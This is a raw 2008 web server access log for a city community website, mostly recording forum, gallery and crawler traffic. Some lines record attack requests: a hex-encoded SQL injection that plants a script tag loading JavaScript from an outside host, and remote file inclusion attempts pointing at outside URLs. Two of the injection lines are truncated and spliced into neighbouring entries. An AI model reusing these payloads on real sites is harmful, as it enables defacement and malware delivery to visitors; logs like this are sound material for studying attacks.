203.84.181.238 - - [28/Aug/2008:05:33:54 -0700] "GET /forum2/style_images/red_crysta/loading_anim.gif HTTP/1.1" 200 2800 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:54 -0700] "GET /forum2/style_images/red_crysta/close.png HTTP/1.1" 200 834 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:55 -0700] "GET /forum2/jscripts/ipb_topic.js HTTP/1.1" 200 14082 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:55 -0700] "GET /forum2/style_images/red_crysta/nav.gif HTTP/1.1" 200 113 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:56 -0700] "GET /forum2/jscripts/ips_text_editor_lite.js HTTP/1.1" 200 9928 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:57 -0700] "GET /forum2/style_images/red_crysta/menu_action_down.gif HTTP/1.1" 200 100 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:57 -0700] "GET /forum2/style_images/red_crysta/t_reply.gif HTTP/1.1" 200 1957 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:58 -0700] "GET /forum2/style_images/red_crysta/t_new.gif HTTP/1.1" 200 1947 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:58 -0700] "GET /forum2/style_images/red_crysta/nav_m.gif HTTP/1.1" 200 53 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:58 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/user-offline.png HTTP/1.1" 200 569 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:58 -0700] "GET /forum2/style_images/red_crysta/to_post_off.gif HTTP/1.1" 200 64 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:59 -0700] "GET /forum2/style_images/red_crysta/pip.gif HTTP/1.1" 200 125 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:59 -0700] "GET /forum2/style_images/red_crysta/spacer.gif HTTP/1.1" 200 43 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:59 -0700] "GET /forum2/style_images/red_crysta/p_up.gif HTTP/1.1" 200 1402 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:59 -0700] "GET /forum2/style_images/red_crysta/p_mq_add.gif HTTP/1.1" 200 1633 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:34:00 -0700] "GET /forum2/style_images/red_crysta/tile_cat.gif HTTP/1.1" 200 2760 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:34:01 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=blog&blogid=5&&req=sendentry&eid=33&st= HTTP/1.1" 200 2965 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:34:08 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=blog&blogid=5&m=1&y=2008 HTTP/1.1" 200 3307 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:34:16 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=blog&blogid=5&m=2&y=2008 HTTP/1.1" 200 3300 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:34:25 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=blog&blogid=5&m=3&y=2008 HTTP/1.1" 200 3308 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
193.163.248.30 - - [28/Aug/2008:05:34:32 -0700] "GET /logs/access_071201.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776drhafouad/us1:41.235.1.1208.115.111.242 - - [28/Aug/2008:05:34:32 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=blog&blogid=5&req=showarchive HTTP/1.1" 200 3458 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
193.163.248.30 - - [28/Aug/2008:05:34:34 -0700] "GET /logs/access_071201.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077thukhaaung/us1:202.156.1208.115.111.242 - - [28/Aug/2008:05:34:39 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=blog&blogid=5&req=syndicate HTTP/1.1" 200 1874 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:34:46 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=blog&blogid=5&showentry=32 HTTP/1.1" 200 4434 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:34:50 -0700] "GET /forum2/index.php?showtopic=210&view=old HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:34:52 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=blog&blogid=5&showentry=33 HTTP/1.1" 200 4301 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:34:56 -0700] "GET /forum2/index.php?s=bb76b58df5a670f8bb8badef55a4a594&showtopic=58 HTTP/1.0" 200 11259 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
82.99.30.69 - - [28/Aug/2008:05:34:58 -0700] "GET /jodera2/profile.php?mode=viewprofile&u=4&sid=d265899b2180f5b3b1426560ea41ae26 HTTP/1.0" 200 21713 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:34:58 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=gallery&cmd=slideshow&show=first&mid=156&album=14&duration=5&closewindow=1&hfoff=1 HTTP/1.1" 200 71 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:35:10 -0700] "GET /sampo/flv/082008/1.flv HTTP/1.1" 200 8798271 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:35:11 -0700] "GET /classifieds/index.php?method=showhtmllist&list=classifiedscategory&rollid=181&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&fromfromid=18&clearoff=1 HTTP/1.0" 200 6345 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
66.249.67.220 - - [28/Aug/2008:05:35:37 -0700] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:35:53 -0700] "GET /forum2/index.php?act=announce&f=16&id=7 HTTP/1.0" 200 3342 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
163.19.117.1 - - [28/Aug/2008:05:35:59 -0700] "GET /logs/access_080405.log/index.php?act=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 768 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.sancarloscity.org"
163.19.117.1 - - [28/Aug/2008:05:36:00 -0700] "GET /logs/index.php?act=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 763 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.sancarloscity.org"
163.19.117.1 - - [28/Aug/2008:05:36:00 -0700] "GET /index.php?act=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 758 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.sancarloscity.org"
125.70.57.227 - - [28/Aug/2008:05:36:01 -0700] "GET /jodera2/joderaphoto/displayimage.php?album=lastup&cat=0&pos=1 HTTP/1.0" 200 61229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
163.19.117.1 - - [28/Aug/2008:05:36:02 -0700] "GET /logs/access_070906.log/index.php?act=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 768 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.sancarloscity.org"
163.19.117.1 - - [28/Aug/2008:05:36:07 -0700] "GET /logs/access_080405.log/index.php?act=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 768 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
163.19.117.1 - - [28/Aug/2008:05:36:07 -0700] "GET /logs/index.php?act=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 763 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
163.19.117.1 - - [28/Aug/2008:05:36:09 -0700] "GET /logs/access_070906.log/index.php?act=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 768 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
163.19.117.1 - - [28/Aug/2008:05:36:09 -0700] "GET /index.php?act=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 758 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:36:16 -0700] "GET /forum2/index.php?showtopic=231&pid=1589&mode=threaded&start= HTTP/1.0" 200 7345 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:36:41 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=gallery&cmd=slideshow&show=first&mid=156&album=16&duration=5&closewindow=1&hfoff=1 HTTP/1.1" 200 71 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:36:54 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=gallery&cmd=user&user=156&op=view_album&album=14 HTTP/1.1" 200 3832 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:37:00 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=gallery&cmd=user&user=156&op=view_album&album=15 HTTP/1.1" 200 3508 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:37:08 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=gallery&cmd=user&user=156&op=view_album&album=16 HTTP/1.1" 200 3775 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:37:15 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=gallery&cmd=user&user=156&op=view_album&album=17 HTTP/1.1" 200 3510 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:37:21 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&showuser=156 HTTP/1.1" 200 4669 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:37:26 -0700] "GET /forum2/index.php?showtopic=231&pid=1560&mode=threaded&start= HTTP/1.0" 200 7010 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:37:26 -0700] "GET /forum2/index.php?s=499786c88149017ed8f34e39af8296d2&automodule=blog&blogid=2 HTTP/1.1" 200 6287 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:37:34 -0700] "GET /forum2/index.php?s=49b2936d8f958bba580b52a822934289&automodule=blog&blogid=8 HTTP/1.1" 200 3246 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:37:40 -0700] "GET /forum2/index.php?s=49b330b929f34c1495151b83a2e32d61&automodule=blog&req=searchresults&searchid=eb3aa3adc27b30a373a730695148f0ab HTTP/1.1" 200 3035 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:37:45 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823& HTTP/1.1" 200 5440 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
66.249.67.220 - - [28/Aug/2008:05:38:17 -0700] "GET /forum2/index.php?showtopic=228&pid=1565&mode=threaded&start= HTTP/1.1" 200 7358 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
74.6.18.233 - - [28/Aug/2008:05:38:29 -0700] "GET /qphotogallery/displayimage.php?album=random&cat=11&pos=-322 HTTP/1.0" 200 22128 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:38:33 -0700] "GET /forum2/index.php?showtopic=231&pid=1573&mode=threaded&start= HTTP/1.0" 200 7364 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
77.73.188.138 - - [28/Aug/2008:05:38:35 -0700] "GET /logs/access_080723.log HTTP/1.1" 200 262144 "http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=all&q=&itag=crv&l=en&ics=utf-8&cs=iso88591&wf%5Bn%5D=3&wf%5B0%5D%5Br%5D=%2B&wf%5B0%5D%5Bq%5D=Portman&wf%5B0%5D%5Bw%5D=&wf%5B1%5D%5Br%5D=%2B&wf%5B1%5D%5Bq%5D=%40yahoo.com&wf%5B1%5D%5Bw%5D=&wf%5B2%5D%5Br%5D=-&wf%5B2%5D%5Bq%5D=&wf%5B2%5D%5Bw%5D=&dincl=&dexcl=&geo=&doctype=text&dfr%5Bu%5D=on&dfr%5Bd%5D=1&dfr%5Bm%5D=1&dfr%5By%5D=2008&dto%5Bu%5D=on&dto%5Bd%5D=28&dto%5Bm%5D=8&dto%5By%5D=2008&hits=100" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
66.249.67.220 - - [28/Aug/2008:05:39:29 -0700] "GET /quisumbingsite/lolaflora_icon.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "www.sancarloscity.org"
194.135.105.1 - - [28/Aug/2008:05:39:42 -0700] "GET //vwar/backup/errors.php?error=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 759 "-" "libwww-perl/5.805" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:39:45 -0700] "GET /picgallery/ratepic.php?pic=476&rate=2 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:39:50 -0700] "GET /picgallery/displayimage.php?pos=-476 HTTP/1.0" 200 13734 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:40:02 -0700] "GET /picgallery/thumbnails.php?album=34&page=1 HTTP/1.0" 200 10418 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
82.99.30.9 - - [28/Aug/2008:05:40:13 -0700] "GET /jodera2/memberlist.php?sid=b2beb0180a3e619cf19e7c37e2ff57f2 HTTP/1.0" 200 80949 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
125.60.185.152 - - [28/Aug/2008:05:40:44 -0700] "GET /aboutsancarlos/ HTTP/1.1" 200 83799 "http://images.google.com.ph/imgres?imgurl=http://www.sancarloscity.org/aboutsancarlos/aetas.gif&imgrefurl=http://www.sancarloscity.org/aboutsancarlos/&h=210&w=155&sz=19&hl=en&start=5&usg=__19LlbeMuz-0kUr-Lo-e4-5KQmzA=&tbnid=h3wtFnhnUG-DYM:&tbnh=106&tbnw=78&prev=/images%3Fq%3Daetas%26gbv%3D2%26hl%3Den" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts)" "www.sancarloscity.org"
125.60.185.152 - - [28/Aug/2008:05:40:44 -0700] "GET /scci01.jpg HTTP/1.1" 200 40666 "http://www.sancarloscity.org/aboutsancarlos/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts)" "www.sancarloscity.org"
125.60.185.152 - - [28/Aug/2008:05:40:46 -0700] "GET /aboutsancarlos/aetas.gif HTTP/1.1" 200 19003 "http://images.google.com.ph/imgres?imgurl=http://www.sancarloscity.org/aboutsancarlos/aetas.gif&imgrefurl=http://www.sancarloscity.org/aboutsancarlos/&h=210&w=155&sz=19&tbnid=h3wtFnhnUG-DYM:&tbnh=106&tbnw=78&hl=en&prev=/images%3Fq%3Daetas%26gbv%3D2%26hl%3Den&frame=small" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts)" "www.sancarloscity.org"
194.135.105.1 - - [28/Aug/2008:05:40:47 -0700] "GET /logs/access_080811.log//vwar/backup/errors.php?error=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 782 "-" "libwww-perl/5.805" "www.sancarloscity.org"
194.135.105.1 - - [28/Aug/2008:05:40:47 -0700] "GET //vwar/backup/errors.php?error=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 759 "-" "libwww-perl/5.805" "www.sancarloscity.org"
194.135.105.1 - - [28/Aug/2008:05:40:48 -0700] "GET /logs//vwar/backup/errors.php?error=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 764 "-" "libwww-perl/5.805" "www.sancarloscity.org"
125.60.185.152 - - [28/Aug/2008:05:40:51 -0700] "GET /aboutsancarlos/ HTTP/1.1" 200 83799 "http://images.google.com.ph/imgres?imgurl=http://www.sancarloscity.org/aboutsancarlos/aetas.gif&imgrefurl=http://www.sancarloscity.org/aboutsancarlos/&h=210&w=155&sz=19&hl=en&start=5&usg=__19LlbeMuz-0kUr-Lo-e4-5KQmzA=&tbnid=h3wtFnhnUG-DYM:&tbnh=106&tbnw=78&prev=/images%3Fq%3Daetas%26gbv%3D2%26hl%3Den" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts)" "www.sancarloscity.org"
125.60.185.152 - - [28/Aug/2008:05:40:52 -0700] "GET /scci01.jpg HTTP/1.1" 200 40666 "http://www.sancarloscity.org/aboutsancarlos/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:40:58 -0700] "GET /forum2/index.php?act=Post&CODE=02&f=9&t=169&qpid=1366 HTTP/1.0" 200 2905 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
67.195.37.186 - - [28/Aug/2008:05:41:03 -0700] "GET /forum2/index.php?showtopic=16 HTTP/1.0" 200 10660 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
120.28.140.12 - - [28/Aug/2008:05:41:09 -0700] "GET /sampo/flv/082008/2.flv HTTP/1.1" 200 851968 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:41:39 -0700] "GET /classifieds/index.php?method=create_form&list=response&rollid=141&fromlist=advertisement&frommethod=showdetails&fromid=141&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&fromfromid=141 HTTP/1.0" 200 5571 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
67.195.37.186 - - [28/Aug/2008:05:41:58 -0700] "GET /classifieds/index.php?method=create_form&list=classifiedsuser&rollid=22&fromlist=classifiedscategory&frommethod=showhtmllist&fromid=22&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist HTTP/1.0" 200 5718 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
82.99.30.44 - - [28/Aug/2008:05:42:07 -0700] "GET /jodera2/index.php?c=1&sid=b2beb0180a3e619cf19e7c37e2ff57f2 HTTP/1.0" 200 42674 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:42:41 -0700] "GET /forum2/index.php?act=findpost&hl=&pid=949 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:42:46 -0700] "GET /forum2/index.php?s=021a296376b800e8a3fe194783063a1a&showtopic=158&st=0&p=949& HTTP/1.0" 200 10681 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
218.38.54.160 - - [28/Aug/2008:05:42:52 -0700] "GET ///vwar/backup/errors.php?error=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 760 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.1.215.166 - - [28/Aug/2008:05:42:57 -0700] "GET /jodera2/viewtopic.php?p=1436&highlight= HTTP/1.0" 200 27208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:43:54 -0700] "GET /picgallery/displayimage.php?album=34&pos=2 HTTP/1.0" 200 12825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:43:59 -0700] "GET /jodera2/login.php HTTP/1.0" 200 13249 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.sancarloscity.org"
89.149.226.251 - - [28/Aug/2008:05:44:03 -0700] "POST /jodera2/login.php?sid=5eb10c863e229455100f0dbdbf5f7672 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.sancarloscity.org"
